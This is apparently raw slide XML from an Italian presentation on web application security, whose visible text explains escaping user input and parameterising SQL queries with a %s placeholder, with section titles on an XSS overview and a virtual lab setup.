          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Questa funzione aggiunge backslashes ai caratteri speciali in una stringa, rendendo sicura la stringa per essere utilizzata in una query SQL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Questa operazione di aggiunta avviene nel dettaglio alla riga 10 attraverso il modulo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> conn.escape_string() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>che sanitizza l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>’user_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e lo salva nella variabile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>safe_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> che poi passerà alla query sql.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 15" id="15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="14874240" y="6251258"/>
            <a:ext cx="1376362" cy="141922"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1835150" cy="189230"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 16" id="16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="49530" y="-3810"/>
              <a:ext cx="1737360" cy="163830"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="163830" w="1737360">
                  <a:moveTo>
                    <a:pt x="33020" y="77470"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="259080" y="73660"/>
                    <a:pt x="280670" y="60960"/>
                    <a:pt x="355600" y="55880"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="579120" y="38100"/>
                    <a:pt x="1606550" y="0"/>
                    <a:pt x="1711960" y="55880"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1729740" y="66040"/>
                    <a:pt x="1734820" y="78740"/>
                    <a:pt x="1734820" y="90170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1734820" y="100330"/>
                    <a:pt x="1725930" y="113030"/>
                    <a:pt x="1718310" y="118110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1710690" y="123190"/>
                    <a:pt x="1694180" y="124460"/>
                    <a:pt x="1686560" y="119380"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1676400" y="114300"/>
                    <a:pt x="1664970" y="93980"/>
                    <a:pt x="1666240" y="82550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1668780" y="72390"/>
                    <a:pt x="1686560" y="55880"/>
                    <a:pt x="1696720" y="54610"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1706880" y="52070"/>
                    <a:pt x="1720850" y="58420"/>
                    <a:pt x="1727200" y="66040"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1732280" y="73660"/>
                    <a:pt x="1737360" y="88900"/>
                    <a:pt x="1733550" y="97790"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1729740" y="107950"/>
                    <a:pt x="1722120" y="115570"/>
                    <a:pt x="1700530" y="123190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1578610" y="163830"/>
                    <a:pt x="515620" y="104140"/>
                    <a:pt x="314960" y="121920"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259080" y="127000"/>
                    <a:pt x="247650" y="138430"/>
                    <a:pt x="207010" y="142240"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154940" y="146050"/>
                    <a:pt x="57150" y="157480"/>
                    <a:pt x="25400" y="140970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11430" y="133350"/>
                    <a:pt x="0" y="115570"/>
                    <a:pt x="1270" y="105410"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2540" y="95250"/>
                    <a:pt x="33020" y="77470"/>
                    <a:pt x="33020" y="77470"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E7191F"/>
            </a:solidFill>
            <a:ln cap="sq">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 17" id="17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="11378565" y="5415915"/>
            <a:ext cx="2006917" cy="140017"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2675890" cy="186690"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 18" id="18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="46990" y="10160"/>
              <a:ext cx="2580640" cy="176530"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="176530" w="2580640">
                  <a:moveTo>
                    <a:pt x="43180" y="40640"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="585470" y="78740"/>
                    <a:pt x="2419350" y="0"/>
                    <a:pt x="2555240" y="58420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2571750" y="66040"/>
                    <a:pt x="2575560" y="72390"/>
                    <a:pt x="2576830" y="81280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2579370" y="92710"/>
                    <a:pt x="2571750" y="114300"/>
                    <a:pt x="2561590" y="119380"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2552700" y="125730"/>
                    <a:pt x="2529840" y="121920"/>
                    <a:pt x="2520950" y="115570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2513330" y="109220"/>
                    <a:pt x="2509520" y="95250"/>
                    <a:pt x="2510790" y="85090"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2513330" y="76200"/>
                    <a:pt x="2520950" y="63500"/>
                    <a:pt x="2529840" y="59690"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2540000" y="55880"/>
                    <a:pt x="2562860" y="60960"/>
                    <a:pt x="2570480" y="68580"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2576830" y="76200"/>
                    <a:pt x="2580640" y="91440"/>
                    <a:pt x="2576830" y="100330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2573020" y="110490"/>
                    <a:pt x="2566670" y="118110"/>
                    <a:pt x="2545080" y="124460"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2388870" y="176530"/>
                    <a:pt x="829310" y="128270"/>
                    <a:pt x="416560" y="121920"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="247650" y="119380"/>
                    <a:pt x="127000" y="129540"/>
                    <a:pt x="59690" y="111760"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31750" y="102870"/>
                    <a:pt x="8890" y="91440"/>
                    <a:pt x="3810" y="78740"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="68580"/>
                    <a:pt x="7620" y="50800"/>
                    <a:pt x="15240" y="44450"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21590" y="39370"/>
                    <a:pt x="43180" y="40640"/>
                    <a:pt x="43180" y="40640"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E7191F"/>
            </a:solidFill>
            <a:ln cap="sq">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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100000">
            <a:off x="-1774108" y="6312875"/>
            <a:ext cx="4881397" cy="4673937"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4673937" w="4881397">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4881397" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4881397" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="2117378" y="6391752"/>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0119723" y="4452088"/>
            <a:ext cx="8168277" cy="7576077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7576077" w="8168277">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8168277" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8168277" y="7576076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7576076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1672016" y="448523"/>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3.1 - PANORAMICA XSS</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0756651" y="2366905"/>
            <a:ext cx="6502649" cy="6891395"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6891395" w="6502649">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6502649" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6502649" y="6891395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6891395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 11" id="1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2" id="1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13" id="13"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1328581" y="1418282"/>
            <a:ext cx="1546845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1 Bold"/>
              </a:rPr>
              <a:t> mysql_real_escape_string in Python con parametrizzazione delle query*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 14" id="14"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1328581" y="2912095"/>
            <a:ext cx="8447198" cy="5743865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4184"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2988">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Nel codice riportato a destra la parametrizzazione delle query avviene alla riga 17 grazie al segnaposto “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2988">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2988">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4184"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2988">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Con “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2988">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2988">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>” stiamo dicendo al database che parte della query sarà un parametro, non un comando. Il database sa che deve trattare i parametri come dati e non come componente logica della query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4184"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4184"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2988">
                <a:solidFill>
                  <a:srgbClr val="DC0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> Infatti parametrizzare le query significa proprio dividere i dati dai comandi SQL.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 15" id="15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="15554325" y="6710362"/>
            <a:ext cx="395288" cy="127635"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="527050" cy="170180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 16" id="16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="49530" y="48260"/>
              <a:ext cx="427990" cy="93980"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="93980" w="427990">
                  <a:moveTo>
                    <a:pt x="34290" y="3810"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="420370" y="12700"/>
                    <a:pt x="426720" y="26670"/>
                    <a:pt x="426720" y="38100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="426720" y="46990"/>
                    <a:pt x="417830" y="59690"/>
                    <a:pt x="410210" y="64770"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405130" y="69850"/>
                    <a:pt x="396240" y="71120"/>
                    <a:pt x="388620" y="69850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="382270" y="69850"/>
                    <a:pt x="374650" y="66040"/>
                    <a:pt x="369570" y="60960"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363220" y="54610"/>
                    <a:pt x="358140" y="39370"/>
                    <a:pt x="359410" y="30480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="359410" y="22860"/>
                    <a:pt x="363220" y="16510"/>
                    <a:pt x="369570" y="11430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375920" y="6350"/>
                    <a:pt x="391160" y="0"/>
                    <a:pt x="400050" y="2540"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410210" y="6350"/>
                    <a:pt x="424180" y="24130"/>
                    <a:pt x="426720" y="34290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427990" y="41910"/>
                    <a:pt x="425450" y="49530"/>
                    <a:pt x="421640" y="55880"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="415290" y="62230"/>
                    <a:pt x="408940" y="66040"/>
                    <a:pt x="392430" y="69850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340360" y="82550"/>
                    <a:pt x="74930" y="93980"/>
                    <a:pt x="26670" y="67310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10160" y="58420"/>
                    <a:pt x="0" y="43180"/>
                    <a:pt x="1270" y="31750"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2540" y="21590"/>
                    <a:pt x="34290" y="3810"/>
                    <a:pt x="34290" y="3810"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E7191F"/>
            </a:solidFill>
            <a:ln cap="sq">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 17" id="17"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1164729" y="8994141"/>
            <a:ext cx="1905298" cy="240664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>*Pratica raccomandata</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 18" id="18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13703618" y="8309610"/>
            <a:ext cx="1073468" cy="126683"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1431290" cy="168910"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 19" id="19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="49530" y="49530"/>
              <a:ext cx="1333500" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="101600" w="1333500">
                  <a:moveTo>
                    <a:pt x="33020" y="2540"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1319530" y="7620"/>
                    <a:pt x="1327150" y="15240"/>
                    <a:pt x="1330960" y="25400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1333500" y="33020"/>
                    <a:pt x="1328420" y="48260"/>
                    <a:pt x="1323340" y="54610"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1319530" y="60960"/>
                    <a:pt x="1311910" y="64770"/>
                    <a:pt x="1305560" y="66040"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1299210" y="67310"/>
                    <a:pt x="1291590" y="67310"/>
                    <a:pt x="1285240" y="63500"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1277620" y="59690"/>
                    <a:pt x="1268730" y="46990"/>
                    <a:pt x="1266190" y="39370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1264920" y="31750"/>
                    <a:pt x="1266190" y="24130"/>
                    <a:pt x="1270000" y="19050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1275080" y="11430"/>
                    <a:pt x="1286510" y="2540"/>
                    <a:pt x="1295400" y="1270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1301750" y="0"/>
                    <a:pt x="1310640" y="1270"/>
                    <a:pt x="1315720" y="6350"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1322070" y="10160"/>
                    <a:pt x="1332230" y="22860"/>
                    <a:pt x="1330960" y="31750"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1330960" y="41910"/>
                    <a:pt x="1324610" y="57150"/>
                    <a:pt x="1309370" y="64770"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1266190" y="87630"/>
                    <a:pt x="1123950" y="67310"/>
                    <a:pt x="988060" y="68580"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="754380" y="68580"/>
                    <a:pt x="128270" y="101600"/>
                    <a:pt x="33020" y="64770"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12700" y="57150"/>
                    <a:pt x="3810" y="46990"/>
                    <a:pt x="1270" y="38100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="29210"/>
                    <a:pt x="6350" y="16510"/>
                    <a:pt x="12700" y="10160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17780" y="5080"/>
                    <a:pt x="33020" y="2540"/>
                    <a:pt x="33020" y="2540"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E7191F"/>
            </a:solidFill>
            <a:ln cap="sq">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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472290" y="1344889"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1161868" y="4294297"/>
            <a:ext cx="15381560" cy="3406776"/>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1.0 - Configurazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="9099"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Laboratorio </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="9099"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Virtuale</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90443"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0525637" y="5288185"/>
            <a:ext cx="9648774" cy="8229600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8229600" w="9648774">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9648774" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96487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7350715">
            <a:off x="-2236136" y="-2895855"/>
            <a:ext cx="7665473" cy="7339690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7339690" w="7665473">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7665472" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7665472" y="7339690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7339690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
